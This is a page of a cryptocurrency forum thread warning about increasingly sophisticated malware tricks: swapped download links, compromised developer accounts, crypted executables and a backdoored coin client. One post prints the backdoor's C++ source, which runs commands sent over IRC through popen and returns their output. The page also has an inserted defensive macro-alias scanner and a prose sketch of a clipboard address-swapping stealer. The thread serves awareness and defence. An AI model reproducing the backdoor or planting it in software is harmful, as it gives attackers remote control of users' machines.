Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 42. (Read 834878 times)

hero member
Activity: 722
Merit: 500
Beware of links sent to your PM box, even ones that look like a link to a thread on the forum.
member
Activity: 116
Merit: 10
Is there any good antivirus to handle it?
sr. member
Activity: 459
Merit: 251
If I use Malwarebytes, can I be protected?
member
Activity: 76
Merit: 10
Useful thread. I always use Sandboxie and Shadow Defender before installing or running any new program nowadays. And medium-level hackers fear VirusTotal because it sends the file for further analysis (as far as I've heard), and their FUD malware loses its FUD ability. So my suggestion will be: use Sandboxie or any similar software, and still use software like Shadow Defender for any kind of new program. And before doing anything, scan it on VirusTotal if you can.

Note: just don't trust any new person or software just like that.

By the way, the user (shsfhs) above me just quoted the original thread with no reply (seems like a new botter in town).
newbie
Activity: 1
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition by casual inspection. Also, this would likely not show up on any virus scans.
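The backdoor quoted above hides popen/pclose behind macro aliases, so a reviewer grepping for popen would see nothing. As an added example (not code from the thread or from the coin's repository), the following C++ helper does the review step the thread implies: it collects plain `#define NAME target` aliases, follows alias chains, and flags every call site whose name resolves to a process-spawning function. The sample input is constructed for this example; the thread shows the resolved names but not the `#define` lines themselves, so the aliases `CRead -> popen` and `CFree -> pclose` are assumptions.

```cpp
// Added example: flag process-spawning calls hidden behind #define aliases.
// Not from the thread or any coin's code base.
#include <iostream>
#include <map>
#include <regex>
#include <set>
#include <sstream>
#include <string>
#include <vector>

struct Finding {
    int line;            // 1-based line number in the scanned source
    std::string ident;   // identifier as written at the call site
    std::string target;  // dangerous function it resolves to
};

// Functions that hand a string to a shell or spawn a process.
static const std::set<std::string> kDangerous = {
    "popen", "_popen", "system", "execl", "execlp", "execle",
    "execv", "execvp", "execvpe", "ShellExecuteA", "CreateProcessA"
};

// Collect single-identifier aliases of the form "#define NAME target".
std::map<std::string, std::string> collect_defines(const std::string& src) {
    static const std::regex re(R"(^\s*#\s*define\s+([A-Za-z_]\w*)\s+([A-Za-z_]\w*)\s*$)");
    std::map<std::string, std::string> defs;
    std::istringstream in(src);
    std::string line;
    std::smatch m;
    while (std::getline(in, line))
        if (std::regex_match(line, m, re)) defs[m[1].str()] = m[2].str();
    return defs;
}

// Follow alias chains (A -> B -> popen); the seen-set stops cycles.
std::string resolve(const std::string& name,
                    const std::map<std::string, std::string>& defs) {
    std::string cur = name;
    std::set<std::string> seen;
    while (defs.count(cur) && seen.insert(cur).second) cur = defs.at(cur);
    return cur;
}

// Scan every "ident(" call site and report those resolving to kDangerous.
std::vector<Finding> scan_source(const std::string& src) {
    static const std::regex call(R"(\b([A-Za-z_]\w*)\s*\()");
    const auto defs = collect_defines(src);
    std::vector<Finding> out;
    std::istringstream in(src);
    std::string line;
    int n = 0;
    while (std::getline(in, line)) {
        ++n;
        if (line.find("#define") != std::string::npos) continue;  // alias line itself
        for (auto it = std::sregex_iterator(line.begin(), line.end(), call);
             it != std::sregex_iterator(); ++it) {
            const std::string ident = (*it)[1].str();
            const std::string target = resolve(ident, defs);
            if (kDangerous.count(target)) out.push_back({n, ident, target});
        }
    }
    return out;
}

// Constructed sample: the aliasing pattern from the thread plus one direct call.
// The #define lines are assumed; the thread only shows the resolved names.
const char* kSample =
    "#define CRead popen\n"
    "#define CFree pclose\n"
    "#define CBuff \"PRIVMSG\"\n"
    "FILE *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), \"r\");\n"
    "CFree(buf);\n"
    "int rc = system(cmd);\n";

int main() {
    for (const Finding& f : scan_source(kSample))
        std::cout << "line " << f.line << ": " << f.ident
                  << " resolves to " << f.target << "\n";
    return 0;
}
```

The scan is deliberately simple (single-token `#define` aliases, one source string); on a real tree you would feed it each file and also treat function-like macros and typedefs such as `CLine` as review prompts rather than trusting the names.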
sr. member
Activity: 266
Merit: 250
I was infected with a virus lol
newbie
Activity: 12
Merit: 0
Could you list the different scams?
legendary
Activity: 1894
Merit: 1001
Speaking of antivirus, can the results from AV-TEST be trusted?

Is it impartial? Do they do proper testing or just surface easy stuff?
Use www.virustotal.com to scan small files (like wallets); it uses +/- 50 AV engines to scan, and it's probably faster than using your onboard AV.

BUT remember, serious hackers will have no problem hiding their payload.
newbie
Activity: 15
Merit: 1
Speaking of antivirus, can the results from AV-TEST be trusted?

Is it impartial? Do they do proper testing or just surface easy stuff?

sr. member
Activity: 270
Merit: 250
Thank you for this warning (I said with 30 trojan horse viruses attacking me at the same time).
legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
Case in point: the NAV dev didn't like this line of questioning. Roll Eyes

Quote from: Bitcoin Forum
A reply of yours, quoted below, was deleted by the starter of a self-moderated topic. There are no rules of self-moderation, so this deletion cannot be appealed. Do not continue posting in this topic if the topic-starter has requested that you leave.

You can create a new topic if you are unsatisfied with this one. If the topic-starter is scamming, post about it in Scam Accusations.

Quote
How much of your personal information is this app accessing/sharing ?

Why does it smell phishy in here !? Roll Eyes
legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
An infected coin daemon can rob a whole exchange. It happened to Cryptsy.
https://bitcointalk.org/index.php?topic=1328521.0;all

Read and/or research much?

It was an inside job. Shocked
https://bitcointalksearch.org/topic/cryptsy-stopping-withdraw-locking-accounts-without-notifying-users-class-action-1173703

That aside, people will someday know them as one of, if not the, main source of crypto-related malware.
full member
Activity: 210
Merit: 100
An infected coin daemon can rob a whole exchange. It happened to Cryptsy.
https://bitcointalk.org/index.php?topic=1328521.0;all
sr. member
Activity: 504
Merit: 250
Great post dude, quoted you.

Yeah, been using KeePass for a while; a unique and complex password for every account is a must nowadays.

PM an addy if you'd like to be tipped some TALK. Wink

Services are catching up, but that means that the hacks will catch up too. I foresee, with apps and security like 2FA and all the mobile wallets, that a smartphone will be the only thing a person carries not too long from now: wallets in the phone, passwords in the phone, 2FA, and finally personal identification, and voila, everything in the smartphone.

THEN the thieves and hackers only need to steal one thing to own you: YOUR PHONE, lol.

Or maybe call Verizon and have them change your phone over to them.
sr. member
Activity: 518
Merit: 254
★YoBit.Net★ 350+ Coins Exchange & Dice
Hmm, this is a problem in the community; if only there was a Bitcoin antivirus... :p But seriously, this is a problem that needs to be fixed.

There are several bitcoin viruses...

There are none within the chain, but there are many that sit in the PC and, when you copy/paste your address, choose from a list and paste an address that looks like yours but is really one from a hierarchical wallet belonging to someone else. That way, when you think you are sending BTC to your wallet, you are really using one of theirs. Pretty easy stuff to write; the hardest part would be to search the list without delaying too much. Changing the contents of the clipboard is easy; checking to see if it is a bitcoin address could be tricky to pull off, but not really hard: simply start with the number of characters, then if that matches check for the absence of spaces, check the first two characters against a list, and go from there. Pretty junior high school stuff.

Wow, that sounds simple and yet it all feels really possible. Well, I have to say it's not just a "possible" hypothetical thing going on. As you said, it's actually happening right now as we speak. Guess one thing you can do to be safe is don't go public on sites where you show a very personal picture of yourself.
hero member
Activity: 868
Merit: 503
Hmm, this is a problem in the community; if only there was a Bitcoin antivirus... :p But seriously, this is a problem that needs to be fixed.

There are several bitcoin viruses...

There are none within the chain, but there are many that sit in the PC and, when you copy/paste your address, choose from a list and paste an address that looks like yours but is really one from a hierarchical wallet belonging to someone else. That way, when you think you are sending BTC to your wallet, you are really using one of theirs. Pretty easy stuff to write; the hardest part would be to search the list without delaying too much. Changing the contents of the clipboard is easy; checking to see if it is a bitcoin address could be tricky to pull off, but not really hard: simply start with the number of characters, then if that matches check for the absence of spaces, check the first two characters against a list, and go from there. Pretty junior high school stuff.
hero member
Activity: 868
Merit: 503
WTF are these noobs? With 0 activity, just saying the same sh** over and over? Lollll.
Everyone should know to never use the same passwords for email and other accounts on many other sites. This is just logic.

While what you say is more than true, it is done every day over and over because most people are more lazy than they are smart... and that is something every thief can count on, from now until the end of time. And that applies to each and every person to some degree. Anyone who disagrees would lock their car door each and every time they leave the car. The most common excuse would be that they are not parking in a bad place or whatever; it is still an excuse. I don't lock the doors on the car that often either, but I won't make excuses: I am too damned lazy to lock/unlock the door each and every time...

But when it comes to financial security, I sure as hell dot the i's and cross the t's.
hero member
Activity: 924
Merit: 506
WTF are these noobs? With 0 activity, just saying the same sh** over and over? Lollll.
Everyone should know to never use the same passwords for email and other accounts on many other sites. This is just logic.
hero member
Activity: 868
Merit: 503
Great post dude, quoted you.

Yeah, been using KeePass for a while; a unique and complex password for every account is a must nowadays.

PM an addy if you'd like to be tipped some TALK. Wink

Services are catching up, but that means that the hacks will catch up too. I foresee, with apps and security like 2FA and all the mobile wallets, that a smartphone will be the only thing a person carries not too long from now: wallets in the phone, passwords in the phone, 2FA, and finally personal identification, and voila, everything in the smartphone.

THEN the thieves and hackers only need to steal one thing to own you: YOUR PHONE, lol.
legendary
Activity: 1894
Merit: 1001
Great post dude, quoted you.

Yeah, been using KeePass for a while; a unique and complex password for every account is a must nowadays.

PM an addy if you'd like to be tipped some TALK. Wink